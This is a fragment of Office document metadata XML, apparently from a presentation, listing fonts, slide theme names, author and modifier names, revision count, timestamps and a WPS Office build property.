      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Times New Roman Bold</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案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11_自定义设计方案</vt:lpstr>
      <vt:lpstr>12_自定义设计方案</vt:lpstr>
      <vt:lpstr>13_自定义设计方案</vt:lpstr>
      <vt:lpstr>14_自定义设计方案</vt:lpstr>
      <vt:lpstr>15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>23_自定义设计方案</vt:lpstr>
      <vt:lpstr>24_自定义设计方案</vt:lpstr>
      <vt:lpstr>25_自定义设计方案</vt:lpstr>
      <vt:lpstr>26_自定义设计方案</vt:lpstr>
      <vt:lpstr>27_自定义设计方案</vt:lpstr>
      <vt:lpstr>28_自定义设计方案</vt:lpstr>
      <vt:lpstr>29_自定义设计方案</vt:lpstr>
      <vt:lpstr>30_自定义设计方案</vt:lpstr>
      <vt:lpstr>31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</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14_Office 主题</vt:lpstr>
      <vt:lpstr>15_Office 主题</vt:lpstr>
      <vt:lpstr>16_Office 主题</vt:lpstr>
      <vt:lpstr>17_Office 主题</vt:lpstr>
      <vt:lpstr>18_Office 主题</vt:lpstr>
      <vt:lpstr>19_Office 主题</vt:lpstr>
      <vt:lpstr>20_Office 主题</vt:lpstr>
      <vt:lpstr>22_Office 主题</vt:lpstr>
      <vt:lpstr>23_Office 主题</vt:lpstr>
      <vt:lpstr>24_Office 主题</vt:lpstr>
      <vt:lpstr>13_Office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Liping</dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>109</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-28T14:49:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-28T14:49:26Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>